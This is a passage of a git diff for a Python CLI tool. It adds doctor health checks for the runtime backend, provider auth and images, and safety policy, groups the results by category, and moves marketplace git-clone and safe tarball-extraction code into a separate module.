raw_org = _load_raw_org_config() + if raw_org is None: + summary["team_context"] = {"state": "standalone", "profile": None, "bundles": []} + summary["resolution"] = {"state": "not_applicable"} + summary["catalog"] = {"state": "not_applicable"} + return summary + + profile_name = _get_selected_profile() + if profile_name is None: + summary["team_context"] = {"state": "no_profile_selected", "profile": None, "bundles": []} + summary["resolution"] = {"state": "not_applicable"} + summary["catalog"] = {"state": "not_applicable"} + return summary + + try: + org = _normalize_org_config(raw_org) + except Exception as exc: + summary["team_context"] = {"state": "error", "error": str(exc)} + summary["resolution"] = {"state": "error", "error": str(exc)} + summary["catalog"] = {"state": "error", "error": str(exc)} + return summary + + team = org.get_profile(profile_name) + bundles_list = list(team.enabled_bundles) if team else [] + summary["team_context"] = { + "state": "active", + "profile": profile_name, + "bundles": bundles_list, + "profile_found": team is not None, + } + + # Resolution + if team is None or not team.enabled_bundles: + summary["resolution"] = {"state": "no_bundles", "plans": []} + else: + try: + result = resolve_render_plan(org, profile_name, provider) + plans_data: list[dict[str, object]] = [] + for plan in result.plans: + plans_data.append( + { + "bundle_id": plan.bundle_id, + "provider": plan.provider, + "effective_artifacts": list(plan.effective_artifacts), + "skipped": list(plan.skipped), + "binding_count": len(plan.bindings), + } + ) + diagnostics_data: list[dict[str, str]] = [ + {"artifact": d.artifact_name, "reason": d.reason} for d in result.diagnostics + ] + summary["resolution"] = { + "state": "resolved", + "provider": provider, + "plans": plans_data, + "diagnostics": diagnostics_data, + } + except Exception as exc: + summary["resolution"] = {"state": "error", "error": str(exc)} + + # Catalog health + catalog = org.governed_artifacts + summary["catalog"] = { + "artifact_count": len(catalog.artifacts), + "bundle_count": len(catalog.bundles), + "binding_count": len(catalog.bindings), + "artifact_names": sorted(catalog.artifacts.keys()), + "bundle_names": sorted(catalog.bundles.keys()), + } + + return summary diff --git a/src/scc_cli/doctor/checks/environment.py b/src/scc_cli/doctor/checks/environment.py index a039a87..379e063 100644 --- a/src/scc_cli/doctor/checks/environment.py +++ b/src/scc_cli/doctor/checks/environment.py @@ -8,11 +8,31 @@ import subprocess from pathlib import Path +from scc_cli.core.contracts import RuntimeInfo from scc_cli.core.enums import SeverityLevel from ..types import CheckResult +def _probe_runtime_info() -> RuntimeInfo | None: + """Return the current runtime probe result when available. + + Doctor checks should report the effective runtime truthfully. When Docker + Desktop sandbox support is unavailable but the probe selected the OCI + backend, that is a healthy runtime path rather than an error. + """ + try: + from scc_cli.bootstrap import get_default_adapters + + adapters = get_default_adapters() + probe = adapters.runtime_probe + if probe is None: + return None + return probe.probe() + except Exception: + return None + + def check_git() -> CheckResult: """Check if Git is installed and accessible.""" from ... import git as git_module @@ -47,8 +67,8 @@ def check_docker() -> CheckResult: name="Docker", passed=False, message="Docker is not installed or not running", - fix_hint="Install Docker Desktop from https://docker.com/products/docker-desktop", - fix_url="https://docker.com/products/docker-desktop", + fix_hint="Install a compatible Docker CLI/runtime such as OrbStack, Docker Desktop, or Colima", + fix_url="https://orbstack.dev/", severity=SeverityLevel.ERROR, ) @@ -61,7 +81,7 @@ def check_docker() -> CheckResult: def check_docker_desktop() -> CheckResult: - """Check Docker Desktop version (sandbox requires 4.50+).""" + """Check Docker Desktop availability for optional sandbox backend support.""" from ... import docker as docker_module desktop_version = docker_module.get_docker_desktop_version() @@ -69,8 +89,10 @@ def check_docker_desktop() -> CheckResult: return CheckResult( name="Docker Desktop", passed=False, - message="Docker Desktop CLI not detected", - fix_hint=("Install or update Docker Desktop 4.50+ and ensure its CLI is first in PATH"), + message="Docker Desktop CLI not detected (optional unless using Docker sandbox backend)", + fix_hint=( + "Install or update Docker Desktop 4.50+ only if you want the Docker sandbox backend" + ), fix_url="https://docker.com/products/docker-desktop", severity=SeverityLevel.WARNING, ) @@ -101,26 +123,41 @@ def check_docker_desktop() -> CheckResult: def check_docker_sandbox() -> CheckResult: - """Check if Docker sandbox feature is available.""" + """Check whether SCC has a valid sandbox backend. + + Docker Desktop sandbox support is one valid backend. If it is unavailable + but the runtime probe selected plain OCI, the check should still pass. + """ from ... import docker as docker_module - if not docker_module.check_docker_sandbox(): + if docker_module.check_docker_sandbox(): return CheckResult( - name="Docker Sandbox", - passed=False, - message="Docker sandbox feature is not available", - fix_hint=( - f"Requires Docker Desktop {docker_module.MIN_DOCKER_VERSION}+ with sandbox enabled. " - "Run 'docker sandbox --help' and verify Docker Desktop is first in PATH" - ), - fix_url="https://docs.docker.com/desktop/features/sandbox/", - severity=SeverityLevel.ERROR, + name="Sandbox Backend", + passed=True, + message="Docker sandbox backend is available", ) + runtime_info = _probe_runtime_info() + if runtime_info is not None and runtime_info.daemon_reachable: + if runtime_info.preferred_backend == "oci": + return CheckResult( + name="Sandbox Backend", + passed=True, + message="Docker sandbox unavailable; SCC will use the OCI backend instead", + version=runtime_info.version, + severity=SeverityLevel.INFO, + ) + return CheckResult( - name="Docker Sandbox", - passed=True, - message="Docker sandbox feature is available", + name="Sandbox Backend", + passed=False, + message="No usable sandbox backend is available", + fix_hint=( + f"Enable Docker sandbox with Docker Desktop {docker_module.MIN_DOCKER_VERSION}+ " + "or use a reachable OCI-capable Docker daemon" + ), + fix_url="https://docs.docker.com/desktop/features/sandbox/", + severity=SeverityLevel.ERROR, ) @@ -143,7 +180,7 @@ def check_docker_running() -> CheckResult: name="Docker Daemon", passed=False, message="Docker daemon is not running", - fix_hint="Start Docker Desktop or run 'sudo systemctl start docker'", + fix_hint="Start OrbStack, Docker Desktop, or another compatible Docker daemon", severity=SeverityLevel.ERROR, ) except (subprocess.TimeoutExpired, FileNotFoundError): @@ -151,7 +188,7 @@ def check_docker_running() -> CheckResult: name="Docker Daemon", passed=False, message="Could not connect to Docker daemon", - fix_hint="Ensure Docker Desktop is running", + fix_hint="Ensure a compatible Docker daemon is running", severity=SeverityLevel.ERROR, ) @@ -184,6 +221,49 @@ def check_wsl2() -> tuple[CheckResult, bool]: ) +def check_runtime_backend() -> CheckResult: + """Check the container runtime backend type and reachability.""" + try: + from scc_cli.bootstrap import get_default_adapters + + adapters = get_default_adapters() + probe = adapters.runtime_probe + if probe is None: + return CheckResult( + name="Runtime Backend", + passed=False, + message="Runtime probe not available in current configuration", + severity=SeverityLevel.WARNING, + ) + info = probe.probe() + except Exception as exc: + return CheckResult( + name="Runtime Backend", + passed=False, + message=f"Failed to probe runtime backend: {exc}", + severity=SeverityLevel.WARNING, + ) + + if not info.daemon_reachable: + backend_label = info.preferred_backend or "unavailable" + return CheckResult( + name="Runtime Backend", + passed=False, + message=f"Runtime backend: {backend_label} — daemon not reachable", + fix_hint="Start OrbStack, Docker Desktop, or another compatible Docker daemon", + severity=SeverityLevel.WARNING, + ) + + backend_label = info.preferred_backend or "unknown" + version_str = info.version or "unknown" + return CheckResult( + name="Runtime Backend", + passed=True, + message=(f"Runtime backend: {backend_label} ({info.display_name}, version {version_str})"), + version=version_str, + ) + + def check_workspace_path(workspace: Path | None = None) -> CheckResult: """Check if workspace path is optimal (not on Windows mount in WSL2).""" from ... import platform as platform_module @@ -210,3 +290,158 @@ def check_workspace_path(workspace: Path | None = None) -> CheckResult: passed=True, message=f"Workspace path is optimal: {workspace}", ) + + +def check_provider_auth(provider_id: str | None = None) -> CheckResult: + """Check whether a provider's auth credentials are cached and usable. + + Delegates to the adapter-owned ``auth_check()`` method on the provider's + ``AgentProvider`` implementation (D037). Each adapter defines its own + readiness criteria: file existence, non-empty content, parseable JSON. + + Wording is truthful: "auth cache present" — we verify the cached file, + not whether the token is valid or unexpired. + + Args: + provider_id: Provider to check. Falls back to selected or ``claude``. + + Returns: + CheckResult with ``category='provider'``. + """ + # Resolve provider + if provider_id is None: + try: + from scc_cli import config as config_module + + configured_provider = config_module.get_selected_provider() + provider_id = ( + configured_provider if configured_provider in {"claude", "codex"} else "claude" + ) + except Exception: + provider_id = "claude" + + # Look up the adapter via bootstrap + try: + from scc_cli.bootstrap import get_default_adapters + + adapters = get_default_adapters() + except Exception: + return CheckResult( + name="Provider Auth", + passed=False, + message="Could not initialise adapter wiring for auth check", + severity=SeverityLevel.WARNING, + category="provider", + ) + + # Dispatch to the correct adapter + provider_adapter = None + if provider_id == "claude": + provider_adapter = adapters.agent_provider + elif provider_id == "codex": + provider_adapter = adapters.codex_agent_provider + + if provider_adapter is None: + return CheckResult( + name="Provider Auth", + passed=False, + message=f"Unknown provider '{provider_id}' — cannot check auth", + severity=SeverityLevel.WARNING, + category="provider", + ) + + # Call adapter-owned auth_check() + try: + readiness = provider_adapter.auth_check() + except Exception as exc: + return CheckResult( + name="Provider Auth", + passed=False, + message=f"Auth check failed for {provider_id}: {exc}", + fix_hint=f"Run 'scc start --provider {provider_id}' to set up auth", + severity=SeverityLevel.WARNING, + category="provider", + ) + + if readiness.status == "present": + return CheckResult( + name="Provider Auth", + passed=True, + message=f"{provider_id} auth cache present ({readiness.mechanism})", + category="provider", + ) + + return CheckResult( + name="Provider Auth", + passed=False, + message=f"{provider_id} auth cache missing ({readiness.mechanism})", + fix_hint=readiness.guidance, + severity=SeverityLevel.WARNING, + category="provider", + ) + + +def check_provider_image(provider_id: str | None = None) -> CheckResult: + """Check whether the active provider's agent image is available locally. + + Runs ``docker image inspect`` for the image ref corresponding to the + currently selected provider. On failure, returns a CheckResult with + ``fix_commands`` containing the exact ``docker build`` invocation. + + Args: + provider_id: Provider to check. Falls back to selected or ``claude``. + """ + from scc_cli.core.errors import InvalidProviderError + from scc_cli.core.provider_registry import get_runtime_spec + + # Resolve the active provider — fall back to claude if unset/unknown + if provider_id is None: + try: + from scc_cli import config as config_module + + configured_provider = config_module.get_selected_provider() + provider_id = ( + configured_provider if configured_provider in {"claude", "codex"} else "claude" + ) + except Exception: + provider_id = "claude" + + try: + spec = get_runtime_spec(provider_id) + image_ref = spec.image_ref + except InvalidProviderError: + # Doctor is diagnostic — graceful fallback for unknown providers + image_ref = get_runtime_spec("claude").image_ref + + try: + result = subprocess.run( + ["docker", "image", "inspect", image_ref], + capture_output=True, + timeout=10, + ) + if result.returncode == 0: + return CheckResult( + name="Provider Image", + passed=True, + message=f"{image_ref} found", + category="provider", + ) + # Image not found + return CheckResult( + name="Provider Image", + passed=False, + message=f"{image_ref} not found", + fix_commands=[f"docker build -t {image_ref} images/scc-agent-{provider_id}/"], + fix_hint=f"Build the {provider_id} agent image", + severity=SeverityLevel.WARNING, + category="provider", + ) + except (subprocess.TimeoutExpired, FileNotFoundError, OSError) as exc: + return CheckResult( + name="Provider Image", + passed=False, + message=f"Could not check provider image: {exc}", + fix_hint="Ensure Docker is installed and reachable", + severity=SeverityLevel.WARNING, + category="provider", + ) diff --git a/src/scc_cli/doctor/checks/safety.py b/src/scc_cli/doctor/checks/safety.py new file mode 100644 index 0000000..593f3d0 --- /dev/null +++ b/src/scc_cli/doctor/checks/safety.py @@ -0,0 +1,83 @@ +"""Safety-policy health check for the doctor module. + +Verifies that the safety-net policy section of the org config is present, +well-formed, and produces a valid ``SafetyPolicy``. +""" + +from __future__ import annotations + +from scc_cli import config as _config_module +from scc_cli.core.enums import SeverityLevel +from scc_cli.core.safety_policy_loader import VALID_SAFETY_NET_ACTIONS, load_safety_policy + +from ..types import CheckResult + + +def _load_raw_org_config() -> dict[str, object] | None: + """Indirection for testability — returns raw cached org config.""" + return _config_module.load_cached_org_config() + + +def check_safety_policy() -> CheckResult: + """Probe org config availability and safety-policy validity. + + Uses ``config.load_cached_org_config()`` for the raw org config dict + (same access pattern as the other organisation checks) and feeds it + through ``load_safety_policy()`` for typed validation. + + Returns + ------- + CheckResult + PASS — valid ``security.safety_net`` section with a recognised action. + WARNING — no org config, or org config without ``safety_net`` section. + ERROR — invalid action value, or unexpected failure during probing. + """ + try: + raw_org = _load_raw_org_config() + + if raw_org is None: + return CheckResult( + name="Safety Policy", + passed=True, + message="No org config found, using default block policy", + severity=SeverityLevel.WARNING, + ) + + # Check structural presence before running the full loader. + security = raw_org.get("security") if isinstance(raw_org, dict) else None + if not isinstance(security, dict) or "safety_net" not in security: + return CheckResult( + name="Safety Policy", + passed=True, + message="No safety_net section in org config, using default block policy", + severity=SeverityLevel.WARNING, + ) + + safety_net = security.get("safety_net") + if isinstance(safety_net, dict): + raw_action = safety_net.get("action") + if isinstance(raw_action, str) and raw_action not in VALID_SAFETY_NET_ACTIONS: + valid_str = ", ".join(sorted(VALID_SAFETY_NET_ACTIONS)) + return CheckResult( + name="Safety Policy", + passed=False, + message=f"Invalid safety_net action '{raw_action}' — falling back to 'block'", + fix_hint=f"Set security.safety_net.action to one of: {valid_str}", + severity=SeverityLevel.ERROR, + ) + + # Full typed load — should succeed given structural checks above. + policy = load_safety_policy(raw_org) + return CheckResult( + name="Safety Policy", + passed=True, + message=f"Effective action: {policy.action}", + ) + + except Exception as exc: + return CheckResult( + name="Safety Policy", + passed=False, + message=f"Unexpected error probing safety policy: {exc}", + severity=SeverityLevel.ERROR, + ) diff --git a/src/scc_cli/doctor/core.py b/src/scc_cli/doctor/core.py index afd58c7..491f181 100644 --- a/src/scc_cli/doctor/core.py +++ b/src/scc_cli/doctor/core.py @@ -10,15 +10,58 @@ check_docker_running, check_docker_sandbox, check_git, + check_provider_auth, + check_provider_image, + check_runtime_backend, + check_safety_policy, check_user_config_valid, check_workspace_path, check_wsl2, ) -from .types import DoctorResult - - -def run_doctor(workspace: Path | None = None) -> DoctorResult: - """Run all health checks and return comprehensive results.""" +from .types import CheckResult, DoctorResult + +_DEFAULT_PROVIDER_IDS: tuple[str, ...] = ("claude", "codex") + +# Category assignment rules: check name → category +_CATEGORY_MAP: dict[str, str] = { + "Git": "backend", + "Docker": "backend", + "Docker Daemon": "backend", + "Docker Desktop": "backend", + "Sandbox Backend": "backend", + "Runtime Backend": "backend", + "Provider Image": "provider", + "Provider Auth": "provider", + "Config Directory": "config", + "User Config": "config", + "Safety Policy": "config", + "Git Worktrees": "worktree", + "Worktree Health": "worktree", + "Branch Conflicts": "worktree", +} + + +def _assign_category(check: CheckResult) -> None: + """Assign a category to a check result based on its name. + + If the check already has a non-default category set (e.g. by the check + function itself), leave it alone. + """ + if check.category != "general": + return # already set by the check function + check.category = _CATEGORY_MAP.get(check.name, "general") + + +def run_doctor( + workspace: Path | None = None, + provider_id: str | None = None, +) -> DoctorResult: + """Run all health checks and return comprehensive results. + + Args: + workspace: Optional workspace path to validate. + provider_id: When set, scopes provider checks to this provider. + """ result = DoctorResult() @@ -45,6 +88,34 @@ def run_doctor(workspace: Path | None = None) -> DoctorResult: else: result.sandbox_ok = False + runtime_check = check_runtime_backend() + result.checks.append(runtime_check) + + provider_ids = (provider_id,) if provider_id is not None else _DEFAULT_PROVIDER_IDS + + if result.docker_ok: + for current_provider_id in provider_ids: + try: + image_check = check_provider_image(provider_id=current_provider_id) + result.checks.append( + _label_provider_check( + image_check, current_provider_id, requested_provider_id=provider_id + ) + ) + except Exception: + pass # partial-results — don't block other checks + + for current_provider_id in provider_ids: + try: + auth_check = check_provider_auth(provider_id=current_provider_id) + result.checks.append( + _label_provider_check( + auth_check, current_provider_id, requested_provider_id=provider_id + ) + ) + except Exception: + pass # partial-results — don't block other checks + wsl2_check, is_wsl2 = check_wsl2() result.checks.append(wsl2_check) result.wsl2_detected = is_wsl2 @@ -80,4 +151,27 @@ def run_doctor(workspace: Path | None = None) -> DoctorResult: user_config_check = check_user_config_valid() result.checks.append(user_config_check) + safety_check = check_safety_policy() + result.checks.append(safety_check) + + # Assign categories to all checks + for check in result.checks: + _assign_category(check) + return result + + +def _label_provider_check( + check: CheckResult, + current_provider_id: str, + *, + requested_provider_id: str | None, +) -> CheckResult: + """Disambiguate provider checks when doctor is showing multiple providers.""" + if requested_provider_id is not None: + return check + + from scc_cli.core.provider_resolution import get_provider_display_name + + check.name = f"{check.name} ({get_provider_display_name(current_provider_id)})" + return check diff --git a/src/scc_cli/doctor/render.py b/src/scc_cli/doctor/render.py index e3df04b..05c0290 100644 --- a/src/scc_cli/doctor/render.py +++ b/src/scc_cli/doctor/render.py @@ -19,16 +19,37 @@ from scc_cli import __version__ from scc_cli.core.enums import SeverityLevel +from scc_cli.core.provider_resolution import get_provider_display_name from .core import run_doctor -from .types import DoctorResult +from .types import CheckResult, DoctorResult + +# Category display order and labels for grouped rendering +_CATEGORY_ORDER: list[str] = ["backend", "provider", "config", "worktree", "general"] +_CATEGORY_LABELS: dict[str, str] = { + "backend": "Backend", + "provider": "Provider", + "config": "Configuration", + "worktree": "Worktree", + "general": "General", +} # ═══════════════════════════════════════════════════════════════════════════════ # Rich Terminal UI Rendering # ═══════════════════════════════════════════════════════════════════════════════ -def render_doctor_results(console: Console, result: DoctorResult) -> None: +def _sort_checks_by_category(checks: list[CheckResult]) -> list[CheckResult]: + """Sort checks by category order, preserving insertion order within each category.""" + order_map = {cat: idx for idx, cat in enumerate(_CATEGORY_ORDER)} + return sorted(checks, key=lambda c: order_map.get(c.category, len(_CATEGORY_ORDER))) + + +def render_doctor_results( + console: Console, + result: DoctorResult, + provider_id: str | None = None, +) -> None: """Render doctor results with beautiful Rich formatting. Uses consistent styling with the rest of the CLI: @@ -36,6 +57,13 @@ def render_doctor_results(console: Console, result: DoctorResult) -> None: - Green for success - Yellow for warnings - Red for errors + + Checks are grouped by category with section headers. + + Args: + console: Rich console for output. + result: Doctor check results. + provider_id: Active provider identifier for branding. Defaults to "claude". """ # Header console.print() @@ -53,14 +81,27 @@ def render_doctor_results(console: Console, result: DoctorResult) -> None: table.add_column("Check", min_width=20) table.add_column("Details", min_width=30) - for check in result.checks: + sorted_checks = _sort_checks_by_category(result.checks) + current_category: str | None = None + + for check in sorted_checks: + # Insert category header when category changes + if check.category != current_category: + current_category = check.category + label = _CATEGORY_LABELS.get(current_category, current_category.title()) + table.add_row( + Text(""), + Text(f"── {label} ──", style="bold cyan"), + Text(""), + ) + # Status icon with color if check.passed: - status = Text(" ", style="bold green") + status = Text(" ✓", style="bold green") elif check.severity == SeverityLevel.WARNING: - status = Text(" ", style="bold yellow") + status = Text(" ⚠", style="bold yellow") else: - status = Text(" ", style="bold red") + status = Text(" ✗", style="bold red") # Check name name = Text(check.name, style="white") @@ -77,18 +118,29 @@ def render_doctor_results(console: Console, result: DoctorResult) -> None: table.add_row(status, name, details) # Wrap table in panel - title_style = "bold green" if result.all_ok else "bold red" + has_failed_checks = any(not check.passed for check in result.checks) + title_style = ( + "bold green" + if result.all_ok and not has_failed_checks + else "bold yellow" + if result.all_ok + else "bold red" + ) version_suffix = f" (scc-cli v{__version__})" title_text = ( f"System Health Check{version_suffix}" - if result.all_ok + if result.all_ok and not has_failed_checks else f"System Health Check - Issues Found{version_suffix}" ) panel = Panel( table, title=f"[{title_style}]{title_text}[/{title_style}]", - border_style="green" if result.all_ok else "red", + border_style="green" + if result.all_ok and not has_failed_checks + else "yellow" + if result.all_ok + else "red", padding=(1, 1), ) @@ -109,11 +161,45 @@ def render_doctor_results(console: Console, result: DoctorResult) -> None: console.print(code_panel) # Summary line - if result.all_ok: + if result.all_ok and not has_failed_checks: + if provider_id is None: + _display = " and ".join( + get_provider_display_name(current_provider_id) + for current_provider_id in ("claude", "codex") + ) + else: + _display = get_provider_display_name(provider_id) console.print() console.print( - " [bold green]All prerequisites met![/bold green] [dim]Ready to run Claude Code.[/dim]" + f" [bold green]All prerequisites met![/bold green] [dim]Ready to run {_display}.[/dim]" ) + elif result.all_ok: + console.print() + summary_parts = [] + if result.warning_count > 0: + summary_parts.append(f"[bold yellow]{result.warning_count} warning(s)[/bold yellow]") + if result.error_count > 0: + summary_parts.append(f"[bold red]{result.error_count} error(s)[/bold red]") + console.print( + f" [bold green]Core prerequisites met.[/bold green] " + f"[dim]Provider setup still needs attention: {' and '.join(summary_parts)}.[/dim]" + ) + + checks_with_commands = [c for c in result.checks if not c.passed and c.fix_commands] + if checks_with_commands: + console.print() + console.print(" [bold cyan]Next Steps[/bold cyan]") + console.print(" [dim]────────────────────────────────────────────────────[/dim]") + console.print() + + for check in checks_with_commands: + console.print(f" [bold white]{check.name}:[/bold white]") + if check.fix_hint: + console.print(f" [dim]{check.fix_hint}[/dim]") + if check.fix_commands: + for i, cmd in enumerate(check.fix_commands, 1): + console.print(f" [cyan]{i}.[/cyan] [white]{cmd}[/white]") + console.print() else: console.print() summary_parts = [] diff --git a/src/scc_cli/doctor/serialization.py b/src/scc_cli/doctor/serialization.py index 2496a55..dddcf3b 100644 --- a/src/scc_cli/doctor/serialization.py +++ b/src/scc_cli/doctor/serialization.py @@ -17,6 +17,7 @@ def build_doctor_json_data(result: DoctorResult) -> dict[str, Any]: "passed": check.passed, "message": check.message, "severity": check.severity, + "category": check.category, } if check.version: check_dict["version"] = check.version diff --git a/src/scc_cli/doctor/types.py b/src/scc_cli/doctor/types.py index e51afde..dac1db0 100644 --- a/src/scc_cli/doctor/types.py +++ b/src/scc_cli/doctor/types.py @@ -25,6 +25,7 @@ class CheckResult: severity: str = SeverityLevel.ERROR code_frame: str | None = None # Optional code frame for syntax errors fix_commands: list[str] | None = None # Copy-pasteable fix commands + category: str = "general" # Grouping key: general, backend, provider, config, worktree @dataclass diff --git a/src/scc_cli/kinds.py b/src/scc_cli/kinds.py index 0212718..211d615 100644 --- a/src/scc_cli/kinds.py +++ b/src/scc_cli/kinds.py @@ -51,6 +51,8 @@ class Kind(str, Enum): # Support SUPPORT_BUNDLE = "SupportBundle" + LAUNCH_AUDIT = "LaunchAudit" + SAFETY_AUDIT = "SafetyAudit" # Config CONFIG_EXPLAIN = "ConfigExplain" diff --git a/src/scc_cli/marketplace/materialize.py b/src/scc_cli/marketplace/materialize.py index 92fb084..b51af3e 100644 --- a/src/scc_cli/marketplace/materialize.py +++ b/src/scc_cli/marketplace/materialize.py @@ -20,10 +20,9 @@ import json import os import shutil -import subprocess from dataclasses import dataclass, field from datetime import datetime, timezone -from pathlib import Path, PurePosixPath, PureWindowsPath +from pathlib import Path from typing import Any from scc_cli.marketplace.constants import ( @@ -31,6 +30,17 @@ MANIFEST_FILE, MARKETPLACE_CACHE_DIR, ) + +# Re-export extracted functions and dataclasses for backward compatibility. +# These were moved to materialize_git.py to keep this module under 800 lines. +from scc_cli.marketplace.materialize_git import ( # noqa: F401 + CloneResult, + DiscoveryResult, + DownloadResult, + _discover_plugins, + download_and_extract, + run_git_clone, +) from scc_cli.marketplace.schema import ( MarketplaceSource, MarketplaceSourceDirectory, @@ -165,36 +175,6 @@ def from_dict(cls, data: dict[str, Any]) -> MaterializedMarketplace: ) -@dataclass -class CloneResult: - """Result of a git clone operation.""" - - success: bool - commit_sha: str | None = None - plugins: list[str] | None = None - canonical_name: str | None = None # Name from marketplace.json - error: str | None = None - - -@dataclass -class DownloadResult: - """Result of a URL download operation.""" - - success: bool - etag: str | None = None - plugins: list[str] | None = None - canonical_name: str | None = None # Name from marketplace.json - error: str | None = None - - -@dataclass -class DiscoveryResult: - """Result of discovering plugins and metadata from a marketplace.""" - - plugins: list[str] - canonical_name: str # The 'name' field from marketplace.json - - # ───────────────────────────────────────────────────────────────────────────── # Manifest Management # ───────────────────────────────────────────────────────────────────────────── @@ -273,240 +253,6 @@ def is_cache_fresh( # ───────────────────────────────────────────────────────────────────────────── -def run_git_clone( - url: str, - target_dir: Path, - branch: str = "main", - depth: int = 1, - fallback_name: str = "", -) -> CloneResult: - """Clone a git repository to target directory. - - Args: - url: Git clone URL - target_dir: Directory to clone into - branch: Branch to checkout - depth: Clone depth (1 for shallow) - fallback_name: Fallback name if marketplace.json doesn't specify one - - Returns: - CloneResult with success status, commit SHA, and canonical name - """ - try: - # Clean target directory if exists - if target_dir.exists(): - shutil.rmtree(target_dir) - - # Clone with shallow depth for efficiency - cmd = [ - "git", - "clone", - "--depth", - str(depth), - "--branch", - branch, - "--", - url, - str(target_dir), - ] - - result = subprocess.run( - cmd, - capture_output=True, - text=True, - timeout=120, - ) - - if result.returncode != 0: - return CloneResult( - success=False, - error=result.stderr or "Clone failed", - ) - - # Get commit SHA - sha_result = subprocess.run( - ["git", "-C", str(target_dir), "rev-parse", "HEAD"], - capture_output=True, - text=True, - ) - commit_sha = sha_result.stdout.strip() if sha_result.returncode == 0 else None - - # Discover plugins and canonical name - discovery = _discover_plugins(target_dir, fallback_name=fallback_name) - - if discovery is None: - return CloneResult( - success=False, - commit_sha=commit_sha, - error="Missing .claude-plugin/marketplace.json", - ) - - return CloneResult( - success=True, - commit_sha=commit_sha, - plugins=discovery.plugins, - canonical_name=discovery.canonical_name, - ) - - except FileNotFoundError: - raise GitNotAvailableError() - except subprocess.TimeoutExpired: - return CloneResult( - success=False, - error="Clone operation timed out", - ) - - -def _discover_plugins(marketplace_dir: Path, fallback_name: str = "") -> DiscoveryResult | None: - """Discover plugins and canonical name from a marketplace directory. - - Args: - marketplace_dir: Root of the marketplace - fallback_name: Name to use if marketplace.json doesn't specify one - - Returns: - DiscoveryResult with plugins and canonical name, or None if structure is invalid - """ - manifest_path = marketplace_dir / ".claude-plugin" / "marketplace.json" - - if not manifest_path.exists(): - return None - - try: - data = json.loads(manifest_path.read_text()) - plugins = data.get("plugins", []) - plugin_names = [p.get("name", "") for p in plugins if isinstance(p, dict)] - - # Get canonical name from marketplace.json - this is what Claude Code uses - canonical_name = data.get("name", fallback_name) - if not canonical_name: - canonical_name = fallback_name - - return DiscoveryResult(plugins=plugin_names, canonical_name=canonical_name) - except (json.JSONDecodeError, KeyError): - return DiscoveryResult(plugins=[], canonical_name=fallback_name) - - -# ───────────────────────────────────────────────────────────────────────────── -# URL Operations -# ───────────────────────────────────────────────────────────────────────────── - - -def download_and_extract( - url: str, - target_dir: Path, - headers: dict[str, str] | None = None, - fallback_name: str = "", - fetcher: RemoteFetcher | None = None, -) -> DownloadResult: - """Download and extract marketplace from URL. - - Args: - url: HTTPS URL to download - target_dir: Directory to extract into - headers: Optional HTTP headers - fallback_name: Fallback name if marketplace.json doesn't specify one - fetcher: Optional RemoteFetcher for HTTP downloads - - Returns: - DownloadResult with success status, ETag, and canonical name - """ - import tarfile - import tempfile - - remote_fetcher = fetcher - if remote_fetcher is None: - from scc_cli.bootstrap import get_default_adapters - - remote_fetcher = get_default_adapters().remote_fetcher - - try: - response = remote_fetcher.get(url, headers=headers, timeout=60) - except Exception as exc: - return DownloadResult( - success=False, - error=str(exc), - ) - - if response.status_code != 200: - return DownloadResult( - success=False, - error=f"HTTP {response.status_code}: Failed to download marketplace", - ) - - etag = response.headers.get("ETag") - - # Save to temp file - with tempfile.NamedTemporaryFile(delete=False, suffix=".tar.gz") as tmp: - tmp.write(response.content) - tmp_path = Path(tmp.name) - - try: - # Clean target directory if exists - if target_dir.exists(): - shutil.rmtree(target_dir) - target_dir.mkdir(parents=True) - - # Extract archive (path-safe) - with tarfile.open(tmp_path, "r:*") as tar: - safe_members: list[tarfile.TarInfo] = [] - for member in tar.getmembers(): - member_path = PurePosixPath(member.name) - windows_member_path = PureWindowsPath(member.name) - if member_path.is_absolute() or windows_member_path.is_absolute(): - return DownloadResult( - success=False, - error=f"Unsafe archive member (absolute path): {member.name}", - ) - if ".." in member_path.parts or ".." in windows_member_path.parts: - return DownloadResult( - success=False, - error=f"Unsafe archive member (path traversal): {member.name}", - ) - if "" in member_path.parts or "" in windows_member_path.parts: - return DownloadResult( - success=False, - error=f"Unsafe archive member (empty path segment): {member.name}", - ) - if "\\" in member.name or windows_member_path.drive: - return DownloadResult( - success=False, - error=f"Unsafe archive member (windows path): {member.name}", - ) - if ( - member.islnk() - or member.issym() - or member.ischr() - or member.isblk() - or member.isfifo() - ): - return DownloadResult( - success=False, - error=f"Unsafe archive member (link/device): {member.name}", - ) - safe_members.append(member) - - tar.extractall(target_dir, members=safe_members) - - # Discover plugins and canonical name - discovery = _discover_plugins(target_dir, fallback_name=fallback_name) - - if discovery is None: - return DownloadResult( - success=False, - error="Missing .claude-plugin/marketplace.json", - ) - - return DownloadResult( - success=True, - etag=etag, - plugins=discovery.plugins, - canonical_name=discovery.canonical_name, - ) - finally: - tmp_path.unlink(missing_ok=True) - - # ───────────────────────────────────────────────────────────────────────────── # Materialization Handlers # ───────────────────────────────────────────────────────────────────────────── diff --git a/src/scc_cli/marketplace/materialize_git.py b/src/scc_cli/marketplace/materialize_git.py new file mode 100644 index 0000000..f27a9c4 --- /dev/null +++ b/src/scc_cli/marketplace/materialize_git.py @@ -0,0 +1,306 @@ +""" +Git clone, URL download, and plugin discovery for marketplace materialization. + +Extracted from materialize.py to keep modules under 800 lines. +Contains low-level operations: git clone, tarball download/extract, and +marketplace plugin discovery. +""" + +from __future__ import annotations + +import json +import shutil +import subprocess +from dataclasses import dataclass +from pathlib import Path, PurePosixPath, PureWindowsPath + +from scc_cli.ports.remote_fetcher import RemoteFetcher + +# ───────────────────────────────────────────────────────────────────────────── +# Result Dataclasses +# ───────────────────────────────────────────────────────────────────────────── + + +@dataclass +class CloneResult: + """Result of a git clone operation.""" + + success: bool + commit_sha: str | None = None + plugins: list[str] | None = None + canonical_name: str | None = None # Name from marketplace.json + error: str | None = None + + +@dataclass +class DownloadResult: + """Result of a URL download operation.""" + + success: bool + etag: str | None = None + plugins: list[str] | None = None + canonical_name: str | None = None # Name from marketplace.json + error: str | None = None + + +@dataclass +class DiscoveryResult: + """Result of discovering plugins and metadata from a marketplace.""" + + plugins: list[str] + canonical_name: str # The 'name' field from marketplace.json + + +# ───────────────────────────────────────────────────────────────────────────── +# Exceptions (imported from parent for type usage) +# ───────────────────────────────────────────────────────────────────────────── + +# We import the error lazily to avoid circular imports; callers already +# import GitNotAvailableError from materialize.py which re-exports it. + + +# ───────────────────────────────────────────────────────────────────────────── +# Plugin Discovery +# ───────────────────────────────────────────────────────────────────────────── + + +def _discover_plugins(marketplace_dir: Path, fallback_name: str = "") -> DiscoveryResult | None: + """Discover 